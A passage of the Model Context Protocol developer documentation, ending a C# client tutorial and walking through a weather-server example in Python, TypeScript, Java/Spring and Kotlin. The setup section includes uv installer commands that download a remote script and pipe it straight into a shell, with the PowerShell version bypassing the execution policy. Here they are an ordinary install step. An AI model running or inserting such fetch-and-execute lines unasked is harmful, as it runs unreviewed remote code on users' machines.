        [var script] when Directory.Exists(script) || (File.Exists(script) && script.EndsWith(".csproj")) => ("dotnet", ["run", "--project", script, "--no-build"]),
        _ => throw new NotSupportedException("An unsupported server script was provided. Supported scripts are .py, .js, or .csproj")
    };
}
```
This creates an MCP client that will connect to a server that is provided as a command line argument. It then lists the available tools from the connected server.
### Query processing logic
Now let's add the core functionality for processing queries and handling tool calls:
```csharp theme={null}
using var anthropicClient = new AnthropicClient(new APIAuthentication(builder.Configuration["ANTHROPIC_API_KEY"]))
    .Messages
    .AsBuilder()
    .UseFunctionInvocation()
    .Build();

var options = new ChatOptions
{
    MaxOutputTokens = 1000,
    ModelId = "claude-sonnet-4-20250514",
    Tools = [.. tools]
};

Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine("MCP Client Started!");
Console.ResetColor();

PromptForInput();
while (Console.ReadLine() is string query && !"exit".Equals(query, StringComparison.OrdinalIgnoreCase))
{
    if (string.IsNullOrWhiteSpace(query))
    {
        PromptForInput();
        continue;
    }

    await foreach (var message in anthropicClient.GetStreamingResponseAsync(query, options))
    {
        Console.Write(message);
    }
    Console.WriteLine();

    PromptForInput();
}

static void PromptForInput()
{
    Console.WriteLine("Enter a command (or 'exit' to quit):");
    Console.ForegroundColor = ConsoleColor.Cyan;
    Console.Write("> ");
    Console.ResetColor();
}
```
## Key Components Explained
### 1. Client Initialization
* The client is initialized using `McpClient.CreateAsync()`, which sets up the transport type and command to run the server.
### 2. Server Connection
* Supports Python, Node.js, and .NET servers.
* The server is started using the command specified in the arguments.
* Uses stdio for communication with the server.
* Initializes the session and available tools.
### 3. Query Processing
* Leverages [Microsoft.Extensions.AI](https://learn.microsoft.com/dotnet/ai/ai-extensions) for the chat client.
* Configures the `IChatClient` to use automatic tool (function) invocation.
* The client reads user input and sends it to the server.
* The server processes the query and returns a response.
* The response is displayed to the user.
## Running the Client
To run your client with any MCP server:
```bash theme={null}
dotnet run -- path/to/server.csproj # dotnet server
dotnet run -- path/to/server.py # python server
dotnet run -- path/to/server.js # node server
```
If you're continuing the weather tutorial from the server quickstart, your command might look something like this: `dotnet run -- path/to/QuickstartWeatherServer`.
The client will:
1. Connect to the specified server
2. List available tools
3. Start an interactive chat session where you can:
* Enter queries
* See tool executions
* Get responses from Claude
4. Exit the session when done
Here's an example of what it should look like if connected to the weather server quickstart:
## Next steps

* Check out our gallery of official MCP servers and implementations
* View the list of [clients that support MCP integrations](/clients)
# Build an MCP server
Source: https://modelcontextprotocol.io/docs/develop/build-server
Get started building your own server to use in Claude for Desktop and other clients.
In this tutorial, we'll build a simple MCP weather server and connect it to a host, Claude for Desktop.
### What we'll be building
We'll build a server that exposes two tools: `get_alerts` and `get_forecast`. Then we'll connect the server to an MCP host (in this case, Claude for Desktop):
Servers can connect to any client. We've chosen Claude for Desktop here for simplicity, but we also have guides on [building your own client](/docs/develop/build-client) as well as a [list of other clients here](/clients).
### Core MCP Concepts
MCP servers can provide three main types of capabilities:
1. **[Resources](/docs/learn/server-concepts#resources)**: File-like data that can be read by clients (like API responses or file contents)
2. **[Tools](/docs/learn/server-concepts#tools)**: Functions that can be called by the LLM (with user approval)
3. **[Prompts](/docs/learn/server-concepts#prompts)**: Pre-written templates that help users accomplish specific tasks
This tutorial will primarily focus on tools.
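For contrast, here is a minimal sketch of what all three capability types look like with the Python SDK's `FastMCP` (illustrative names only; the rest of this tutorial registers tools exclusively):

```python theme={null}
from mcp.server.fastmcp import FastMCP

mcp = FastMCP("demo")

@mcp.resource("config://app")  # a readable resource
def app_config() -> str:
    return "theme=dark"

@mcp.tool()  # a callable tool
def add(a: int, b: int) -> int:
    """Add two numbers."""
    return a + b

@mcp.prompt()  # a reusable prompt template
def review(code: str) -> str:
    return f"Please review this code:\n\n{code}"
```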
Let's get started with building our weather server! [You can find the complete code for what we'll be building here.](https://github.com/modelcontextprotocol/quickstart-resources/tree/main/weather-server-python)
### Prerequisite knowledge
This quickstart assumes you have familiarity with:
* Python
* LLMs like Claude
### Logging in MCP Servers
When implementing MCP servers, be careful about how you handle logging:
**For STDIO-based servers:** Never write to standard output (stdout). This includes:
* `print()` statements in Python
* `console.log()` in JavaScript
* `fmt.Println()` in Go
* Similar stdout functions in other languages
Writing to stdout will corrupt the JSON-RPC messages and break your server.
**For HTTP-based servers:** Standard output logging is fine since it doesn't interfere with HTTP responses.
### Best Practices
1. Use a logging library that writes to stderr or files.
2. For Python, be especially careful - `print()` writes to stdout by default.
### Quick Examples
```python theme={null}
# ❌ Bad (STDIO)
print("Processing request")

# ✅ Good (STDIO)
import logging
logging.basicConfig(level=logging.INFO)  # the default handler writes to stderr
logging.info("Processing request")
```
### System requirements
* Python 3.10 or higher installed.
* You must use the Python MCP SDK 1.2.0 or higher.
### Set up your environment
First, let's install `uv` and set up our Python project and environment:
```bash macOS/Linux theme={null}
curl -LsSf https://astral.sh/uv/install.sh | sh
```
```powershell Windows theme={null}
powershell -ExecutionPolicy ByPass -c "irm https://astral.sh/uv/install.ps1 | iex"
```
Make sure to restart your terminal afterwards to ensure that the `uv` command gets picked up.
Now, let's create and set up our project:
```bash macOS/Linux theme={null}
# Create a new directory for our project
uv init weather
cd weather
# Create virtual environment and activate it
uv venv
source .venv/bin/activate
# Install dependencies
uv add "mcp[cli]" httpx
# Create our server file
touch weather.py
```
```powershell Windows theme={null}
# Create a new directory for our project
uv init weather
cd weather
# Create virtual environment and activate it
uv venv
.venv\Scripts\activate
# Install dependencies
uv add mcp[cli] httpx
# Create our server file
new-item weather.py
```
Now let's dive into building your server.
## Building your server
### Importing packages and setting up the instance
Add these to the top of your `weather.py`:
```python theme={null}
from typing import Any
import httpx
from mcp.server.fastmcp import FastMCP
# Initialize FastMCP server
mcp = FastMCP("weather")
# Constants
NWS_API_BASE = "https://api.weather.gov"
USER_AGENT = "weather-app/1.0"
```
The FastMCP class uses Python type hints and docstrings to automatically generate tool definitions, making it easy to create and maintain MCP tools.
### Helper functions
Next, let's add our helper functions for querying and formatting the data from the National Weather Service API:
```python theme={null}
async def make_nws_request(url: str) -> dict[str, Any] | None:
    """Make a request to the NWS API with proper error handling."""
    headers = {"User-Agent": USER_AGENT, "Accept": "application/geo+json"}
    async with httpx.AsyncClient() as client:
        try:
            response = await client.get(url, headers=headers, timeout=30.0)
            response.raise_for_status()
            return response.json()
        except Exception:
            return None


def format_alert(feature: dict) -> str:
    """Format an alert feature into a readable string."""
    props = feature["properties"]
    return f"""
Event: {props.get("event", "Unknown")}
Area: {props.get("areaDesc", "Unknown")}
Severity: {props.get("severity", "Unknown")}
Description: {props.get("description", "No description available")}
Instructions: {props.get("instruction", "No specific instructions provided")}
"""
```
### Implementing tool execution
The tool execution handler is responsible for actually executing the logic of each tool. Let's add it:
```python theme={null}
@mcp.tool()
async def get_alerts(state: str) -> str:
    """Get weather alerts for a US state.

    Args:
        state: Two-letter US state code (e.g. CA, NY)
    """
    url = f"{NWS_API_BASE}/alerts/active/area/{state}"
    data = await make_nws_request(url)

    if not data or "features" not in data:
        return "Unable to fetch alerts or no alerts found."

    if not data["features"]:
        return "No active alerts for this state."

    alerts = [format_alert(feature) for feature in data["features"]]
    return "\n---\n".join(alerts)


@mcp.tool()
async def get_forecast(latitude: float, longitude: float) -> str:
    """Get weather forecast for a location.

    Args:
        latitude: Latitude of the location
        longitude: Longitude of the location
    """
    # First get the forecast grid endpoint
    points_url = f"{NWS_API_BASE}/points/{latitude},{longitude}"
    points_data = await make_nws_request(points_url)

    if not points_data:
        return "Unable to fetch forecast data for this location."

    # Get the forecast URL from the points response
    forecast_url = points_data["properties"]["forecast"]
    forecast_data = await make_nws_request(forecast_url)

    if not forecast_data:
        return "Unable to fetch detailed forecast."

    # Format the periods into a readable forecast
    periods = forecast_data["properties"]["periods"]
    forecasts = []
    for period in periods[:5]:  # Only show next 5 periods
        forecast = f"""
{period["name"]}:
Temperature: {period["temperature"]}°{period["temperatureUnit"]}
Wind: {period["windSpeed"]} {period["windDirection"]}
Forecast: {period["detailedForecast"]}
"""
        forecasts.append(forecast)

    return "\n---\n".join(forecasts)
```
### Running the server
Finally, let's initialize and run the server:
```python theme={null}
def main():
    # Initialize and run the server
    mcp.run(transport="stdio")


if __name__ == "__main__":
    main()
```
Your server is complete! Run `uv run weather.py` to start the MCP server, which will listen for messages from MCP hosts.
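Before moving to a host, you can sanity-check the tool functions directly, since `FastMCP`'s decorator leaves them callable as ordinary functions (a quick ad-hoc check, assuming that decorator behavior holds in your SDK version):

```python theme={null}
# smoke_test.py - run with: uv run smoke_test.py
import asyncio

from weather import get_alerts, get_forecast

async def main():
    print(await get_alerts("CA"))
    print(await get_forecast(38.58, -121.49))  # Sacramento, CA

asyncio.run(main())
```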
Let's now test your server from an existing MCP host, Claude for Desktop.
## Testing your server with Claude for Desktop
Claude for Desktop is not yet available on Linux. Linux users can proceed to the [Building a client](/docs/develop/build-client) tutorial to build an MCP client that connects to the server we just built.
First, make sure you have Claude for Desktop installed. [You can install the latest version
here.](https://claude.ai/download) If you already have Claude for Desktop, **make sure it's updated to the latest version.**
We'll need to configure Claude for Desktop for whichever MCP servers you want to use. To do this, open your Claude for Desktop App configuration at `~/Library/Application Support/Claude/claude_desktop_config.json` in a text editor. Make sure to create the file if it doesn't exist.
For example, if you have [VS Code](https://code.visualstudio.com/) installed:
```bash macOS/Linux theme={null}
code ~/Library/Application\ Support/Claude/claude_desktop_config.json
```
```powershell Windows theme={null}
code $env:AppData\Claude\claude_desktop_config.json
```
You'll then add your servers in the `mcpServers` key. The MCP UI elements will only show up in Claude for Desktop if at least one server is properly configured.
In this case, we'll add our single weather server like so:
```json macOS/Linux theme={null}
{
  "mcpServers": {
    "weather": {
      "command": "uv",
      "args": [
        "--directory",
        "/ABSOLUTE/PATH/TO/PARENT/FOLDER/weather",
        "run",
        "weather.py"
      ]
    }
  }
}
```
```json Windows theme={null}
{
  "mcpServers": {
    "weather": {
      "command": "uv",
      "args": [
        "--directory",
        "C:\\ABSOLUTE\\PATH\\TO\\PARENT\\FOLDER\\weather",
        "run",
        "weather.py"
      ]
    }
  }
}
```
You may need to put the full path to the `uv` executable in the `command` field. You can get this by running `which uv` on macOS/Linux or `where uv` on Windows.
Make sure you pass in the absolute path to your server. You can get this by running `pwd` on macOS/Linux or `cd` on Windows Command Prompt. On Windows, remember to use double backslashes (`\\`) or forward slashes (`/`) in the JSON path.
This tells Claude for Desktop:
1. There's an MCP server named "weather"
2. To launch it by running `uv --directory /ABSOLUTE/PATH/TO/PARENT/FOLDER/weather run weather.py`
Save the file, and restart **Claude for Desktop**.
Let's get started with building our weather server! [You can find the complete code for what we'll be building here.](https://github.com/modelcontextprotocol/quickstart-resources/tree/main/weather-server-typescript)
### Prerequisite knowledge
This quickstart assumes you have familiarity with:
* TypeScript
* LLMs like Claude
### Logging in MCP Servers
When implementing MCP servers, be careful about how you handle logging:
**For STDIO-based servers:** Never write to standard output (stdout). This includes:
* `print()` statements in Python
* `console.log()` in JavaScript
* `fmt.Println()` in Go
* Similar stdout functions in other languages
Writing to stdout will corrupt the JSON-RPC messages and break your server.
**For HTTP-based servers:** Standard output logging is fine since it doesn't interfere with HTTP responses.
### Best Practices
1. Use a logging library that writes to stderr or files, such as `logging` in Python.
2. For JavaScript, be especially careful - `console.log()` writes to stdout by default.
### Quick Examples
```javascript theme={null}
// ❌ Bad (STDIO)
console.log("Server started");
// ✅ Good (STDIO)
console.error("Server started"); // stderr is safe
```
### System requirements
For TypeScript, make sure you have the latest version of Node installed.
### Set up your environment
First, let's install Node.js and npm if you haven't already. You can download them from [nodejs.org](https://nodejs.org/).
Verify your Node.js installation:
```bash theme={null}
node --version
npm --version
```
For this tutorial, you'll need Node.js version 16 or higher.
Now, let's create and set up our project:
```bash macOS/Linux theme={null}
# Create a new directory for our project
mkdir weather
cd weather
# Initialize a new npm project
npm init -y
# Install dependencies
npm install @modelcontextprotocol/sdk zod@3
npm install -D @types/node typescript
# Create our files
mkdir src
touch src/index.ts
```
```powershell Windows theme={null}
# Create a new directory for our project
md weather
cd weather
# Initialize a new npm project
npm init -y
# Install dependencies
npm install @modelcontextprotocol/sdk zod@3
npm install -D @types/node typescript
# Create our files
md src
new-item src\index.ts
```
Update your `package.json` to add `"type": "module"` and a build script:
```json package.json theme={null}
{
  "type": "module",
  "bin": {
    "weather": "./build/index.js"
  },
  "scripts": {
    "build": "tsc && chmod 755 build/index.js"
  },
  "files": ["build"]
}
```
Create a `tsconfig.json` in the root of your project:
```json tsconfig.json theme={null}
{
  "compilerOptions": {
    "target": "ES2022",
    "module": "Node16",
    "moduleResolution": "Node16",
    "outDir": "./build",
    "rootDir": "./src",
    "strict": true,
    "esModuleInterop": true,
    "skipLibCheck": true,
    "forceConsistentCasingInFileNames": true
  },
  "include": ["src/**/*"],
  "exclude": ["node_modules"]
}
```
Now let's dive into building your server.
## Building your server
### Importing packages and setting up the instance
Add these to the top of your `src/index.ts`:
```typescript theme={null}
import { McpServer } from "@modelcontextprotocol/sdk/server/mcp.js";
import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js";
import { z } from "zod";

const NWS_API_BASE = "https://api.weather.gov";
const USER_AGENT = "weather-app/1.0";

// Create server instance
const server = new McpServer({
  name: "weather",
  version: "1.0.0",
});
```
### Helper functions
Next, let's add our helper functions for querying and formatting the data from the National Weather Service API:
```typescript theme={null}
// Helper function for making NWS API requests
async function makeNWSRequest<T>(url: string): Promise<T | null> {
  const headers = {
    "User-Agent": USER_AGENT,
    Accept: "application/geo+json",
  };

  try {
    const response = await fetch(url, { headers });
    if (!response.ok) {
      throw new Error(`HTTP error! status: ${response.status}`);
    }
    return (await response.json()) as T;
  } catch (error) {
    console.error("Error making NWS request:", error);
    return null;
  }
}

interface AlertFeature {
  properties: {
    event?: string;
    areaDesc?: string;
    severity?: string;
    status?: string;
    headline?: string;
  };
}

// Format alert data
function formatAlert(feature: AlertFeature): string {
  const props = feature.properties;
  return [
    `Event: ${props.event || "Unknown"}`,
    `Area: ${props.areaDesc || "Unknown"}`,
    `Severity: ${props.severity || "Unknown"}`,
    `Status: ${props.status || "Unknown"}`,
    `Headline: ${props.headline || "No headline"}`,
    "---",
  ].join("\n");
}

interface ForecastPeriod {
  name?: string;
  temperature?: number;
  temperatureUnit?: string;
  windSpeed?: string;
  windDirection?: string;
  shortForecast?: string;
}

interface AlertsResponse {
  features: AlertFeature[];
}

interface PointsResponse {
  properties: {
    forecast?: string;
  };
}

interface ForecastResponse {
  properties: {
    periods: ForecastPeriod[];
  };
}
```
### Implementing tool execution
The tool execution handler is responsible for actually executing the logic of each tool. Let's add it:
```typescript theme={null}
// Register weather tools
server.registerTool(
  "get_alerts",
  {
    description: "Get weather alerts for a state",
    inputSchema: {
      state: z
        .string()
        .length(2)
        .describe("Two-letter state code (e.g. CA, NY)"),
    },
  },
  async ({ state }) => {
    const stateCode = state.toUpperCase();
    const alertsUrl = `${NWS_API_BASE}/alerts?area=${stateCode}`;
    const alertsData = await makeNWSRequest<AlertsResponse>(alertsUrl);

    if (!alertsData) {
      return {
        content: [
          {
            type: "text",
            text: "Failed to retrieve alerts data",
          },
        ],
      };
    }

    const features = alertsData.features || [];
    if (features.length === 0) {
      return {
        content: [
          {
            type: "text",
            text: `No active alerts for ${stateCode}`,
          },
        ],
      };
    }

    const formattedAlerts = features.map(formatAlert);
    const alertsText = `Active alerts for ${stateCode}:\n\n${formattedAlerts.join("\n")}`;

    return {
      content: [
        {
          type: "text",
          text: alertsText,
        },
      ],
    };
  },
);

server.registerTool(
  "get_forecast",
  {
    description: "Get weather forecast for a location",
    inputSchema: {
      latitude: z
        .number()
        .min(-90)
        .max(90)
        .describe("Latitude of the location"),
      longitude: z
        .number()
        .min(-180)
        .max(180)
        .describe("Longitude of the location"),
    },
  },
  async ({ latitude, longitude }) => {
    // Get grid point data
    const pointsUrl = `${NWS_API_BASE}/points/${latitude.toFixed(4)},${longitude.toFixed(4)}`;
    const pointsData = await makeNWSRequest<PointsResponse>(pointsUrl);

    if (!pointsData) {
      return {
        content: [
          {
            type: "text",
            text: `Failed to retrieve grid point data for coordinates: ${latitude}, ${longitude}. This location may not be supported by the NWS API (only US locations are supported).`,
          },
        ],
      };
    }

    const forecastUrl = pointsData.properties?.forecast;
    if (!forecastUrl) {
      return {
        content: [
          {
            type: "text",
            text: "Failed to get forecast URL from grid point data",
          },
        ],
      };
    }

    // Get forecast data
    const forecastData = await makeNWSRequest<ForecastResponse>(forecastUrl);
    if (!forecastData) {
      return {
        content: [
          {
            type: "text",
            text: "Failed to retrieve forecast data",
          },
        ],
      };
    }

    const periods = forecastData.properties?.periods || [];
    if (periods.length === 0) {
      return {
        content: [
          {
            type: "text",
            text: "No forecast periods available",
          },
        ],
      };
    }

    // Format forecast periods
    const formattedForecast = periods.map((period: ForecastPeriod) =>
      [
        `${period.name || "Unknown"}:`,
        `Temperature: ${period.temperature || "Unknown"}°${period.temperatureUnit || "F"}`,
        `Wind: ${period.windSpeed || "Unknown"} ${period.windDirection || ""}`,
        `${period.shortForecast || "No forecast available"}`,
        "---",
      ].join("\n"),
    );

    const forecastText = `Forecast for ${latitude}, ${longitude}:\n\n${formattedForecast.join("\n")}`;

    return {
      content: [
        {
          type: "text",
          text: forecastText,
        },
      ],
    };
  },
);
```
### Running the server
Finally, implement the main function to run the server:
```typescript theme={null}
async function main() {
  const transport = new StdioServerTransport();
  await server.connect(transport);
  console.error("Weather MCP Server running on stdio");
}

main().catch((error) => {
  console.error("Fatal error in main():", error);
  process.exit(1);
});
```
Make sure to run `npm run build` to build your server! This is a very important step in getting your server to connect.
Let's now test your server from an existing MCP host, Claude for Desktop.
## Testing your server with Claude for Desktop
Claude for Desktop is not yet available on Linux. Linux users can proceed to the [Building a client](/docs/develop/build-client) tutorial to build an MCP client that connects to the server we just built.
First, make sure you have Claude for Desktop installed. [You can install the latest version
here.](https://claude.ai/download) If you already have Claude for Desktop, **make sure it's updated to the latest version.**
We'll need to configure Claude for Desktop for whichever MCP servers you want to use. To do this, open your Claude for Desktop App configuration at `~/Library/Application Support/Claude/claude_desktop_config.json` in a text editor. Make sure to create the file if it doesn't exist.
For example, if you have [VS Code](https://code.visualstudio.com/) installed:
```bash macOS/Linux theme={null}
code ~/Library/Application\ Support/Claude/claude_desktop_config.json
```
```powershell Windows theme={null}
code $env:AppData\Claude\claude_desktop_config.json
```
You'll then add your servers in the `mcpServers` key. The MCP UI elements will only show up in Claude for Desktop if at least one server is properly configured.
In this case, we'll add our single weather server like so:
```json macOS/Linux theme={null}
{
  "mcpServers": {
    "weather": {
      "command": "node",
      "args": ["/ABSOLUTE/PATH/TO/PARENT/FOLDER/weather/build/index.js"]
    }
  }
}
```
```json Windows theme={null}
{
  "mcpServers": {
    "weather": {
      "command": "node",
      "args": ["C:\\PATH\\TO\\PARENT\\FOLDER\\weather\\build\\index.js"]
    }
  }
}
```
This tells Claude for Desktop:
1. There's an MCP server named "weather"
2. Launch it by running `node /ABSOLUTE/PATH/TO/PARENT/FOLDER/weather/build/index.js`
Save the file, and restart **Claude for Desktop**.
This is a quickstart demo based on Spring AI MCP auto-configuration and boot starters.
To learn how to create sync and async MCP Servers, manually, consult the [Java SDK Server](/sdk/java/mcp-server) documentation.
Let's get started with building our weather server!
[You can find the complete code for what we'll be building here.](https://github.com/spring-projects/spring-ai-examples/tree/main/model-context-protocol/weather/starter-stdio-server)
For more information, see the [MCP Server Boot Starter](https://docs.spring.io/spring-ai/reference/api/mcp/mcp-server-boot-starter-docs.html) reference documentation.
For manual MCP Server implementation, refer to the [MCP Server Java SDK documentation](/sdk/java/mcp-server).
### Logging in MCP Servers
When implementing MCP servers, be careful about how you handle logging:
**For STDIO-based servers:** Never write to standard output (stdout). This includes:
* `print()` statements in Python
* `console.log()` in JavaScript
* `fmt.Println()` in Go
* Similar stdout functions in other languages
Writing to stdout will corrupt the JSON-RPC messages and break your server.
**For HTTP-based servers:** Standard output logging is fine since it doesn't interfere with HTTP responses.
### Best Practices
1. Use a logging library that writes to stderr or files.
2. Ensure any configured logging library will not write to STDOUT
### System requirements
* Java 17 or higher installed.
* [Spring Boot 3.3.x](https://docs.spring.io/spring-boot/installing.html) or higher
### Set up your environment
Use the [Spring Initializr](https://start.spring.io/) to bootstrap the project.
You will need to add the following dependencies:
```xml Maven theme={null}
<dependency>
    <groupId>org.springframework.ai</groupId>
    <artifactId>spring-ai-starter-mcp-server</artifactId>
</dependency>
<dependency>
    <groupId>org.springframework</groupId>
    <artifactId>spring-web</artifactId>
</dependency>
```
```groovy Gradle theme={null}
dependencies {
    implementation "org.springframework.ai:spring-ai-starter-mcp-server"
    implementation "org.springframework:spring-web"
}
```
Then configure your application by setting the application properties. Disabling the banner and the console log pattern keeps stdout free for the STDIO transport's JSON-RPC messages:
```bash application.properties theme={null}
spring.main.bannerMode=off
logging.pattern.console=
```
```yaml application.yml theme={null}
logging:
pattern:
console:
spring:
main:
banner-mode: off
```
The [Server Configuration Properties](https://docs.spring.io/spring-ai/reference/api/mcp/mcp-server-boot-starter-docs.html#_configuration_properties) documents all available properties.
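For example, you can customize the name and version the server advertises to clients. A brief sketch (the values here are illustrative; consult the reference above for the full list of properties):
```properties theme={null}
# Illustrative values for the server's advertised identity
spring.ai.mcp.server.name=weather-server
spring.ai.mcp.server.version=0.0.1
```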
Now let's dive into building your server.
## Building your server
### Weather Service
Let's implement a [WeatherService.java](https://github.com/spring-projects/spring-ai-examples/blob/main/model-context-protocol/weather/starter-stdio-server/src/main/java/org/springframework/ai/mcp/sample/server/WeatherService.java) that uses a REST client to query the data from the National Weather Service API:
```java theme={null}
@Service
public class WeatherService {
private final RestClient restClient;
public WeatherService() {
this.restClient = RestClient.builder()
.baseUrl("https://api.weather.gov")
.defaultHeader("Accept", "application/geo+json")
.defaultHeader("User-Agent", "WeatherApiClient/1.0 (your@email.com)")
.build();
}
@Tool(description = "Get weather forecast for a specific latitude/longitude")
public String getWeatherForecastByLocation(
double latitude, // Latitude coordinate
double longitude // Longitude coordinate
) {
// Returns detailed forecast including:
// - Temperature and unit
// - Wind speed and direction
// - Detailed forecast description
}
@Tool(description = "Get weather alerts for a US state")
public String getAlerts(
@ToolParam(description = "Two-letter US state code (e.g. CA, NY)") String state
) {
// Returns active alerts including:
// - Event type
// - Affected area
// - Severity
// - Description
// - Safety instructions
}
// ......
}
```
The `@Service` annotation will auto-register the service in your application context.
The Spring AI `@Tool` annotation makes it easy to create and maintain MCP tools.
The auto-configuration will automatically register these tools with the MCP server.
### Create your Boot Application
```java theme={null}
@SpringBootApplication
public class McpServerApplication {
public static void main(String[] args) {
SpringApplication.run(McpServerApplication.class, args);
}
@Bean
public ToolCallbackProvider weatherTools(WeatherService weatherService) {
return MethodToolCallbackProvider.builder().toolObjects(weatherService).build();
}
}
```
This uses `MethodToolCallbackProvider` to convert the `@Tool`-annotated methods into actionable callbacks used by the MCP server.
### Running the server
Finally, let's build the server:
```bash theme={null}
./mvnw clean install
```
This will generate an `mcp-weather-stdio-server-0.0.1-SNAPSHOT.jar` file within the `target` folder.
Let's now test your server from an existing MCP host, Claude for Desktop.
## Testing your server with Claude for Desktop
Claude for Desktop is not yet available on Linux.
First, make sure you have Claude for Desktop installed.
[You can install the latest version here.](https://claude.ai/download) If you already have Claude for Desktop, **make sure it's updated to the latest version.**
We'll need to configure Claude for Desktop for whichever MCP servers you want to use.
To do this, open your Claude for Desktop App configuration at `~/Library/Application Support/Claude/claude_desktop_config.json` in a text editor.
Make sure to create the file if it doesn't exist.
For example, if you have [VS Code](https://code.visualstudio.com/) installed:
```bash macOS/Linux theme={null}
code ~/Library/Application\ Support/Claude/claude_desktop_config.json
```
```powershell Windows theme={null}
code $env:AppData\Claude\claude_desktop_config.json
```
You'll then add your servers in the `mcpServers` key.
The MCP UI elements will only show up in Claude for Desktop if at least one server is properly configured.
In this case, we'll add our single weather server like so:
```json macOS/Linux theme={null}
{
"mcpServers": {
"spring-ai-mcp-weather": {
"command": "java",
"args": [
"-Dspring.ai.mcp.server.stdio=true",
"-jar",
"/ABSOLUTE/PATH/TO/PARENT/FOLDER/mcp-weather-stdio-server-0.0.1-SNAPSHOT.jar"
]
}
}
}
```
```json Windows theme={null}
{
"mcpServers": {
"spring-ai-mcp-weather": {
"command": "java",
"args": [
"-Dspring.ai.mcp.server.transport=STDIO",
"-jar",
"C:\\ABSOLUTE\\PATH\\TO\\PARENT\\FOLDER\\weather\\mcp-weather-stdio-server-0.0.1-SNAPSHOT.jar"
]
}
}
}
```
Make sure you pass in the absolute path to your server.
This tells Claude for Desktop:
1. There's an MCP server named "spring-ai-mcp-weather"
2. To launch it by running `java -Dspring.ai.mcp.server.stdio=true -jar /ABSOLUTE/PATH/TO/PARENT/FOLDER/mcp-weather-stdio-server-0.0.1-SNAPSHOT.jar`
Save the file, and restart **Claude for Desktop**.
## Testing your server with Java client
### Create an MCP Client manually
Use the `McpClient` to connect to the server:
```java theme={null}
var stdioParams = ServerParameters.builder("java")
.args("-jar", "/ABSOLUTE/PATH/TO/PARENT/FOLDER/mcp-weather-stdio-server-0.0.1-SNAPSHOT.jar")
.build();
var stdioTransport = new StdioClientTransport(stdioParams);
var mcpClient = McpClient.sync(stdioTransport).build();
mcpClient.initialize();
ListToolsResult toolsList = mcpClient.listTools();
CallToolResult weather = mcpClient.callTool(
new CallToolRequest("getWeatherForecastByLocation",
Map.of("latitude", "47.6062", "longitude", "-122.3321")));
CallToolResult alert = mcpClient.callTool(
new CallToolRequest("getAlerts", Map.of("state", "NY")));
mcpClient.closeGracefully();
```
### Use MCP Client Boot Starter
Create a new boot starter application using the `spring-ai-starter-mcp-client` dependency:
```xml theme={null}
<dependency>
    <groupId>org.springframework.ai</groupId>
    <artifactId>spring-ai-starter-mcp-client</artifactId>
</dependency>
```
and set the `spring.ai.mcp.client.stdio.servers-configuration` property to point to your `claude_desktop_config.json`.
You can reuse the existing Claude for Desktop configuration:
```properties theme={null}
spring.ai.mcp.client.stdio.servers-configuration=file:PATH/TO/claude_desktop_config.json
```
When you start your client application, the auto-configuration will automatically create MCP clients from the `claude_desktop_config.json`.
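As a quick smoke test, you can list the tools exposed by the configured servers at startup. This is a sketch that assumes the auto-configuration publishes the initialized clients as a `List<McpSyncClient>` bean (see the reference below for the exact contract):
```java theme={null}
@SpringBootApplication
public class McpClientApplication {

    public static void main(String[] args) {
        SpringApplication.run(McpClientApplication.class, args);
    }

    // Assumption: the MCP client starter exposes a List<McpSyncClient> bean
    @Bean
    CommandLineRunner listMcpTools(List<McpSyncClient> mcpClients) {
        return args -> mcpClients.forEach(client ->
            client.listTools().tools().forEach(tool ->
                // Log to stderr so stdout stays clean for STDIO transports
                System.err.println("Discovered tool: " + tool.name())));
    }
}
```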
For more information, see the [MCP Client Boot Starter](https://docs.spring.io/spring-ai/reference/api/mcp/mcp-client-boot-starter-docs.html) reference documentation.
## More Java MCP Server examples
The [starter-webflux-server](https://github.com/spring-projects/spring-ai-examples/tree/main/model-context-protocol/weather/starter-webflux-server) demonstrates how to create an MCP server using SSE transport.
It showcases how to define and register MCP Tools, Resources, and Prompts using Spring Boot's auto-configuration capabilities.
Let's get started with building our weather server! [You can find the complete code for what we'll be building here.](https://github.com/modelcontextprotocol/kotlin-sdk/tree/main/samples/weather-stdio-server)
### Prerequisite knowledge
This quickstart assumes you have familiarity with:
* Kotlin
* LLMs like Claude
### System requirements
* Java 17 or higher installed.
### Set up your environment
First, let's install `java` and `gradle` if you haven't already.
You can download `java` from the [official Oracle JDK website](https://www.oracle.com/java/technologies/downloads/).
Verify your `java` installation:
```bash theme={null}
java --version
```
Now, let's create and set up your project:
```bash macOS/Linux theme={null}
# Create a new directory for our project
mkdir weather
cd weather
# Initialize a new kotlin project
gradle init
```
```powershell Windows theme={null}
# Create a new directory for our project
md weather
cd weather
# Initialize a new kotlin project
gradle init
```
After running `gradle init`, you will be presented with options for creating your project.
Select **Application** as the project type, **Kotlin** as the programming language, and **Java 17** as the Java version.
Alternatively, you can create a Kotlin application using the [IntelliJ IDEA project wizard](https://kotlinlang.org/docs/jvm-get-started.html).
After creating the project, add the following dependencies:
```kotlin build.gradle.kts theme={null}
val mcpVersion = "0.4.0"
val slf4jVersion = "2.0.9"
val ktorVersion = "3.1.1"
dependencies {
implementation("io.modelcontextprotocol:kotlin-sdk:$mcpVersion")
implementation("org.slf4j:slf4j-nop:$slf4jVersion")
implementation("io.ktor:ktor-client-content-negotiation:$ktorVersion")
implementation("io.ktor:ktor-serialization-kotlinx-json:$ktorVersion")
}
```
```groovy build.gradle theme={null}
def mcpVersion = '0.4.0'
def slf4jVersion = '2.0.9'
def ktorVersion = '3.1.1'
dependencies {
implementation "io.modelcontextprotocol:kotlin-sdk:$mcpVersion"
implementation "org.slf4j:slf4j-nop:$slf4jVersion"
implementation "io.ktor:ktor-client-content-negotiation:$ktorVersion"
implementation "io.ktor:ktor-serialization-kotlinx-json:$ktorVersion"
}
```
Also, add the following plugins to your build script:
```kotlin build.gradle.kts theme={null}
plugins {
kotlin("plugin.serialization") version "your_version_of_kotlin"
id("com.gradleup.shadow") version "8.3.9"
}
```
```groovy build.gradle theme={null}
plugins {
id 'org.jetbrains.kotlin.plugin.serialization' version 'your_version_of_kotlin'
id 'com.gradleup.shadow' version '8.3.9'
}
```
Now let's dive into building your server.
## Building your server
### Setting up the instance
Add a server initialization function:
```kotlin theme={null}
// Main function to run the MCP server
fun `run mcp server`() {
// Create the MCP Server instance with a basic implementation
val server = Server(
Implementation(
name = "weather", // Tool name is "weather"
version = "1.0.0" // Version of the implementation
),
ServerOptions(
capabilities = ServerCapabilities(tools = ServerCapabilities.Tools(listChanged = true))
)
)
// Create a transport using standard IO for server communication
val transport = StdioServerTransport(
